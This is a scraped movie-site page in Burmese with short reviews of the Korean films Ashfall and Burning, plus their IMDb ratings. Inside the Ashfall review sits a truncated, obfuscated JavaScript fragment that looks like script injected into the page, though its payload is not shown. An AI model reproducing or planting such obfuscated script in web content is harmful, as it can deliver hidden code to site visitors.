Alpha Premium

Ok Ja-yeon

Ashfall (2020) 6.3
Ashfall (2020) ဇာတ်လမ်းမှာပါဝင်သရုပ်ဆောင်ကြတဲ့သူတွေကလည်း အကုန်ဒိတ်ဒိတ်ကြဲတွေချည်းပါပဲ။ ပရိတ်သတ်ရင်းနှီးပြီးသား Lee Byung Hun,Train to Busan ထဲကလူသန်ကြီး Ma Dong Seok,Along with the God ထဲက Ha Jung woo,The King ထဲက ဘုရင်ကြီးရဲ့အဆက်ဟောင်းလေး Bae Suzyအစရှိတဲ့ နာမည်ကြီးသရုပ်ဆောင်များစွာပါဝင်အားဖြည့်ထားတဲ့ ကြည့်လို့တော်တော်ကောင်းတဲ့ Action ကားကောင်းလေးပါ။ ဇာတ်လမ်းဇာတ်ကွက်လေးလဲ ကောင်းသလို Action ခန်းတွေကလည် းတော်တော်အားရစရာကောင်းလို့ Action ကားကောင်းမျှော်နေတဲ့ ပရိတ်သတ်ကြီးနဲ့ကွက်တိကျမယ်ထင်ပါတယ်။ ဇာတ်လမ်းအကျဉ်းကတော့နည်းနည်းပဲပြောပြမယ်။ အရမ်းကောင်းလို့ကိုယ်တိုင်ကြည့်စေချင်ပါတယ်။ သဘာဝဘေးအန္တရာယ်ဆိုတာမျိုးက ကြိုတင်ခန့်မှန်းမရတဲ့အရာမျိုးပါ။ တောင်ကိုရီးယားနဲ့ မြောက်ကိုရီးယားဆိုတာကလည်း မတည့်သာမတည့်တာ နိုင်ငံချင်းကျစပ်ဆက်နေတာပါ။ မြောက်မှာတစ်ခုခုဖြစ်ရင်အဲ့အကျိုးဆက်ကို တောင်ကိုရီးယားက ခံစားရမှာဖြစ်သလို တောင်ကိုရီးယားမှာ တစ်ခုခုဖြစ်ရင်လည်း မြောက်ကိုရီးယားကခံစားကြရမှာပါ။ နိုင်ငံချင်းအမုန်းတရားနဲ့ကွဲနေကြပေမယ့် တချိန်ကလူမျိုးတူနိုင်ငံတူဖြစ်လို့ စည်းလုံးသင့်တယ်ဆိုတဲ့ msgလေးကိုလဲ ထည့်ပေးထားပါတယ်။ မြောက်ကိုရီးယားမှာရှိတဲ့ ဘတ်ဒူမီးတောင်ပေါက်ကွဲမှုကိုအခြေခံ ရိုက်ကူးထားပြီးဒီသဘာဝဘေးအန္တရာယ်ဆိုးကြီးကို နယ်ပယ်အသီးသီးအလွှာစုံကလူတွေ ဘယ်လိုတွန်းလှန်ကြတယ် အရေးကြုံရင်ဘယ်လို စည်းလုံးကြတယ်ဆိုတာလေးကို တွေ့မြင်ရမှာပါ။ မင်းသားကြီး မာဒုန်ဆော့ကဒီကားမှာမီးတောင်လေ့လာသူ ပရောဖက်ဆာဂန်းဘုန်ရယ်အဖြစ် သရုပ်ဆောင်ထားပြီး Along with the God မင်းသား ဟာဂျန်ဝူးကတော့ လက်နက်လေ့လာရေးနဲ့ကျွမ်းကျင်တပ်ကြပ် ဂျိုအင်ချန်းအဖြစ်သရုပ်ဆောင်ထားပါတယ်။ ထူးချွန်မင်းသား လီဗြောင်ဟွန်းကတော့ မြောက်ကိုရီးယားအထူးလေ့ကျင့်တပ်သားလျှို့ဝှက်သူလျှို လီဂျွန်းဖြောင်းအဖြစ် တော်တော်လေးသဘာဝကျအောင် သရုပ်ဆောင်ထားနိုင်ပြီး ဘေဆူဇီကတော့ တပ်ကြပ်ဂျိုအင်ချန်းဇနီးအဖြစ်သရုပ်ဆောင်ထားပါတယ်။ ညွှန်းချင်တာကတော့ Action ကားသိပ်မကြိုက်တဲ့သူတောင် ကြည့်ပြီးရင်ကြိုက်သွားနိုင်မယ့် ကားမျိုးဖြစ်တဲ့အပြင်တချို့နေရာမှ ာသဘာဝကျတဲ့ ပေါ့ပေါ့ပါးပါးရီစရာလေးတွေထည့်ပေးထားလို့ ဇာတ်လမ်းလဲမပေါ့သလို ဇာတ်သိမ်းခန်းကလဲ မျက်ရည်ဝဲစေတဲ့အထိကောင်းပါတယ်။အားလုံးပဲ ဒီကားလေးကိုခံစားကြည့်လိုက်စေချင်ပါတယ်။ function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const ...
6.3
IMDB: 6.3/10 2,032 votes
movie

Ashfall (2020)

2019
Premium
Burning 7.5
Burning Burning (2018)ဆိုတဲ့ကားလေးကတော့ Rating 7.5 ထိ ရရှိထားတဲ့ Drama, Mystery ကားလေးတစ်ကားဖြစ်ပါတယ် ဇာတ်လမ်းအစမှာတော့ လီဂျောင်ဆူနဲ့ ရှင်းဟဲမီဆိုတဲ့ ငယ်သူငယ်ချင်းနှစ်ယောက်အမှတ်မထင်ပြန်တွေ့ကြပြီး တယောက်နဲ့တယောက် မသိလိုက်ချိန်မှာပဲ ချစ်သွားခဲ့ကြတယ် အဲ့လိုနဲ့ တရက်ကောင်မလေးက အာဖရိကကို ခရီးသွားရင်း အကိုဘန်ဆိုတဲ့လူနဲ့ သိကျွမ်းလာခဲ့ပြီး အရမ်းရင်းနှီးသွားရင်း ကောင်လေးနဲ့လည်း အသိအကိုဆိုပြီး မိတ်ဆက်ပေးခဲ့တယ် အဲ့လိုနဲ့ အကိုဘန်နဲ့ ကောင်မလေးက ရင်းနှီးလွန်လာပြီး တပူးပူးတတွဲတွဲဖြစ်လာတော့ ကောင်လေးခင်မျာ ပြောလဲမပြောရဲ ခံလဲခံစားရရင်း ကြိတ်ခံနေလာခဲ့တယ် အဲ့လိုနဲ့ အကိုဘန်ဆိုတဲ့လူက ကောင်မလေူတွေနဲ့ ပက်သက်ပြီး သတ်သတ်နေခဲ့တယ်ဆိုတာကို သိသွားတဲ့အချိန်မှာတော့ ရှင်းဟဲမီတယောက်ပျောက်ဆုံးနေခဲ့ပါပြီ ဒါပေမယ့်လည်း မသေချာသေးတာမို့ ကောင်လေးက ကြိတ်ခံစားရင်း လိုက်လဲရှာ စုံစမ်းရင်း သေမတတ်ခံစားပြီး လျှောက်သွားနေခဲ့ပါတယ် နောက်ဆုံးမှာတော့ ကောင်လေးက ကောင်မလေးကို ရှာတွေ့သွားမှာလား ဒါမှမဟုတ် တကယ်ပဲ အကိုဘန်က ကောင်မလေးကို သတ်လိုက်တာလား ကောင်လေးကရော ဘာတွေဆက်လုပ်မှာလဲဆိုတဲ့ ဆန်းကြယ်လှပြီး စိတ်ဝင်စားစရာဇာတ်လမ်းလေးကို Burning (2018)ဆိုတဲ့ ဇာတ်ကားလေးမှာ ကြည့်လိုက်ရအောင်နော် (ဇာတ်လမ်းအညွှန်းနဲ့ဘာသာပြန်သူကတော့ May ...
7.5
IMDB: 7.5/10 42,166 votes
movie

Burning

2018
Premium

Release year

Genres

Release year